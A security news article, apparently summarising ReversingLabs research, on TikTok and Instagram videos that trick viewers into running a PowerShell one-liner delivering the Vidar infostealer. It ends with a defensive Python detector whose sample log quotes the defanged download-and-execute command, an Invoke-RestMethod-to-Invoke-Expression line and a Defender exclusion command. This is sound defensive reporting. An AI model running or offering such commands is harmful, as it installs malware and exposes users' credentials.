Algorithmic Exploitation: How TikTok and Instagram Reels Amplify Vidar Malware

ReversingLabs research reveals threat actors are using fake Spotify Premium tutorials to distribute the Vidar infostealer via PowerShell, strategically leveraging social media recommendation engines to maximize reach.

On June 9, 2026, ReversingLabs documented two ongoing campaigns using TikTok and Instagram Reels to distribute the Vidar infostealer. The attacks employ fake video tutorials for Spotify Premium and other paid software. Threat actors have worked out and exploited the platforms' algorithmic weighting (saves and shares carry more influence than likes) to organically amplify the visibility of malicious content.

Key Takeaways
  • ReversingLabs identified two distinct campaigns on TikTok and Instagram Reels using fake Spotify Premium tutorials to deliver the Vidar infostealer via PowerShell commands.
  • A single video accumulated over 100,000 views, 1,699 saves, and 974 shares; attackers deliberately target saves and shares because recommendation algorithms prioritize these metrics over likes.
  • The PowerShell commands follow the structure iex irm msget[.]run/spotify, which downloads build.exe—confirmed by Spectra Analyze as a Vidar payload.
  • Malicious accounts windows.tips and windows.insights mimic Microsoft branding with blue crown avatars, exploiting user familiarity with the brand.

Anatomy of the "Tutorial" Campaign

The first campaign features technically polished videos, AI-generated voiceovers, and accounts that replicate Microsoft’s visual identity. The handles windows.tips and windows.insights are calculated choices: the blue-and-white branding builds a bridge of trust, leading users familiar with Windows toward seemingly legitimate technical instructions.

The videos explicitly guide users to PowerShell, providing vocal or text-based instructions to execute iex irm msget[.]run/spotify—a one-liner combining Invoke-Expression, Invoke-RestMethod, and a lookalike domain. This results in the download of build.exe, identified by ReversingLabs Spectra Analyze as Vidar. This infostealer has been active since 2018 and is marketed as Malware-as-a-Service for a $300 lifetime license. The latest documented update occurred in October 2025, introducing improvements to stability and evasion.

The choice of PowerShell is not accidental: it is a legitimate tool present on every Windows system. The average user does not distinguish between a standard system command and one that downloads malware. As ReversingLabs researchers noted: "A non-technical user cannot tell the difference and may assume it is legitimate. Attackers rely on this lack of understanding."

Algorithmic Gaming: Saves and Shares as Leverage

What distinguishes this campaign from simple viral distribution is the attackers' sophisticated understanding of algorithmic weights. ReversingLabs documented 1,699 saves compared to 1,581 likes on a single video that exceeded 100,000 views, alongside 974 shares. The strategy does not aim for superficial popularity but optimizes for the specific metrics that TikTok and Instagram prioritize in their recommendation models.

Saves and shares signal "useful" content or material to be "referenced later," prompting the algorithm to reward them with increased visibility in discovery feeds. Attackers have constructed their videos to maximize these specific interactions rather than passive likes. Consequently, the algorithm organically amplifies the malicious content, extending its reach to users who never searched for pirated software.

"The two approaches are means to different ends, and the differences demonstrate how attackers can exploit different aspects of social media engagement to reach more potential victims" — ReversingLabs Researchers

The Second Campaign: Engagement Baiting and Survey Gates

The second campaign documented by ReversingLabs uses a less technical register: raw videos promising free access to Spotify Premium, with comments enabled as the primary layer of interaction. In this instance, the attack does not begin immediately with PowerShell but with reply-baiting. The attacker responds to comments with links to more detailed tutorials or profile pages that redirect to sites such as d4ug[.]site, pluginchad[.]xyz, and maxapk[.]xyz.

On these domains, access to the promised software is blocked by surveys. ReversingLabs researchers were unable to complete these questionnaires; therefore, the final payload of this second chain remains unverified. It cannot be confirmed that Vidar is the malware delivered here; the report records an obstacle to the investigation rather than a result. However, the structure confirms tactical flexibility: while the first campaign focuses on immediate execution, the second builds trust through social interaction prior to delivery.

A narrative control element also emerges in the moderation dynamics. ReversingLabs reports that the creators of the malicious videos systematically delete warning comments. Furthermore, attempts to report the content to Instagram as a scam were rejected during the investigation. The platform allowed material flagged by security researchers to remain active, though the report does not state whether the content is still accessible at the time of publication.

Analysis: The Algorithm as the Primary Actor

Editorial Insight — Trust is not stolen via a zero-day exploit, but through a gradual transfer. The user sees a recommended video, not a searched one. They see an account with Microsoft branding, not a suspicious domain. They see step-by-step instructions, not a security warning. Each individual step appears legitimate; the chain itself is anything but.

The difference between a viral campaign and an algorithmic campaign lies in targeting. Virality depends on human sharing; algorithmic reach depends on the mathematical weight a platform assigns to specific interactions. Attackers here have understood and exploited this distinction, optimizing for saves and shares rather than passive likes.

Context: A Recurring Pattern, Not an Isolated Case

Trend Micro previously documented the same technical stack in 2025: TikTok videos, ClickFix tactics, PowerShell commands, and the Vidar and StealC infostealers. Trend Micro researchers observed videos that "verbally instruct viewers to execute a sequence of commands to supposedly activate legitimate software, such as Windows OS, Microsoft Office, CapCut, and Spotify." They concluded that "this campaign highlights how attackers are ready to exploit whatever social media platform is currently popular to distribute malware."

The ReversingLabs research, published June 9, 2026, documents campaign activity with an undetermined prior duration. Malwarebytes has corroborated these findings, noting that similar TikTok-based attacks commonly add Windows Defender exclusions to facilitate persistence.

Mitigation and Defense

The following recommendations are editorially derived from the documented facts and are not direct mandates from the primary sources.

  • Recognize that video tutorials for pirated or "free" software on social platforms require independent verification: no legitimate technical brand guides users toward PowerShell via social media.
  • Verify that PowerShell commands proposed in social content do not use iex irm patterns with external domains; this structure executes remote code without oversight.
  • Report accounts mimicking Microsoft branding with names like windows.tips or windows.insights: corporate identity impersonation is a documented campaign indicator.
  • Consider that high save and share counts on technical content may reflect malicious algorithmic optimization rather than authentic quality.
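As an added example, not code from ReversingLabs or any of the cited sources, the following Python script applies the check in the second recommendation to PowerShell script block log lines: it resolves the iex/irm aliases, flags any command that feeds Invoke-RestMethod or Invoke-WebRequest output into Invoke-Expression (piped or nested), extracts the remote domain being fetched, and, following the Malwarebytes observation above, also flags Defender exclusion changes. The log line format, the hostnames and all sample records are constructed for this example; only the iex irm msget[.]run/spotify command comes from the report, kept defanged as it appears there.

```python
"""Flag PowerShell one-liners that pass remote content to Invoke-Expression.

Added example for this article; not code from ReversingLabs. The log line
shape (EventID=4104 ... ScriptBlockText=...) is an assumption for the sample,
not taken from the report.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Aliases that hide the cmdlet name; the command in the article uses iex and irm.
ALIASES = {
    "iex": "invoke-expression",
    "irm": "invoke-restmethod",
    "iwr": "invoke-webrequest",
    "curl": "invoke-webrequest",  # PowerShell alias on Windows, not the curl binary
    "wget": "invoke-webrequest",
}
REMOTE_FETCH = {"invoke-restmethod", "invoke-webrequest"}
REMOTE_EXEC = {"invoke-expression"}
DEFENDER_TAMPER = {"add-mppreference", "set-mppreference"}

SCRIPT_FIELD = re.compile(r"ScriptBlockText=(.*)$")
TOKEN = re.compile(r"""[^\s|;()'"]+""")


@dataclass
class Finding:
    line_no: int
    reasons: List[str] = field(default_factory=list)
    remote_target: Optional[str] = None


def normalize(script: str) -> List[str]:
    """Lower-cased tokens with aliases resolved. The [.] defanging is removed so a
    defanged indicator and the live form of the same domain match identically."""
    script = script.replace("[.]", ".")
    return [ALIASES.get(t.lower(), t.lower()) for t in TOKEN.findall(script)]


def fetch_target(tokens: List[str]) -> Optional[str]:
    """First URL-or-domain-looking argument after a remote-fetch cmdlet, skipping
    -Parameter switches such as -Uri or -UseBasicParsing."""
    for i, tok in enumerate(tokens):
        if tok in REMOTE_FETCH:
            for arg in tokens[i + 1:]:
                if arg.startswith("-"):
                    continue
                if arg in REMOTE_EXEC or arg in REMOTE_FETCH:
                    break
                if "://" in arg or "." in arg:
                    return arg
    return None


def classify(line_no: int, script: str) -> Optional[Finding]:
    """Return a Finding when the script block matches a risky pattern, else None."""
    tokens = normalize(script)
    names = set(tokens)
    finding = Finding(line_no)
    # Download cmdlet and Invoke-Expression in the same block: the iex irm pattern,
    # whether written as 'iex irm host/path', 'iex (irm ...)' or 'irm ... | iex'.
    if names & REMOTE_EXEC and names & REMOTE_FETCH:
        finding.remote_target = fetch_target(tokens)
        finding.reasons.append("remote content passed to Invoke-Expression")
    # Defender exclusions or real-time protection being switched off.
    if names & DEFENDER_TAMPER and any(
        t.startswith("-exclusion") or t == "-disablerealtimemonitoring" for t in tokens
    ):
        finding.reasons.append("Defender exclusion or real-time protection change")
    return finding if finding.reasons else None


def scan(log_text: str) -> List[Finding]:
    """Run classify() over every line that carries a ScriptBlockText field."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), start=1):
        m = SCRIPT_FIELD.search(line)
        if m:
            f = classify(n, m.group(1))
            if f:
                findings.append(f)
    return findings


# Constructed sample log; hosts and example.invalid domains are made up.
SAMPLE_LOG = """\
2026-06-09T10:14:02Z EventID=4104 Host=WS01 ScriptBlockText=iex irm msget[.]run/spotify
2026-06-09T10:15:30Z EventID=4104 Host=WS01 ScriptBlockText=Get-Process | Sort-Object CPU -Descending | Select-Object -First 5
2026-06-09T10:16:11Z EventID=4104 Host=WS02 ScriptBlockText=Invoke-RestMethod -Uri https://loader.example.invalid/p | Invoke-Expression
2026-06-09T10:17:45Z EventID=4104 Host=WS02 ScriptBlockText=Add-MpPreference -ExclusionPath "C:\\Users\\Public"
2026-06-09T10:18:02Z EventID=4104 Host=WS03 ScriptBlockText=Invoke-RestMethod -Uri https://api.example.invalid/status | ConvertFrom-Json
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        target = f" target={f.remote_target}" if f.remote_target else ""
        print(f"line {f.line_no}: {'; '.join(f.reasons)}{target}")
```

The last sample line shows the boundary the detector draws: fetching JSON with Invoke-RestMethod is ordinary administration and is not flagged; only the combination with Invoke-Expression is. In a real deployment the remote_target field is what you would match against the domains listed in the report and then pivot on in proxy or DNS logs.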

Closing

The campaign documented by ReversingLabs on June 9, 2026, demonstrates two distinct methodologies united by a common principle: an understanding of platform recommendation mechanisms. While the first campaign targets immediate technical execution, the second builds trust through social interaction. Both exploit the same vulnerability—user familiarity with the interface and the algorithm—to transform entertainment platforms into malware distribution channels.

The original research was conducted by ReversingLabs; other cited sources report the same findings without independent technical analysis. Information is based on the report published June 9, 2026, with previous campaign activity of undetermined duration.

Information has been verified against the cited sources and is current at the time of publication.

Sources and references
  1. reversinglabs.com
  2. helpnetsecurity.com
  3. malwarebytes.com
  4. infosecurity-magazine.com
  5. unit42.paloaltonetworks.com
  6. thehackernews.com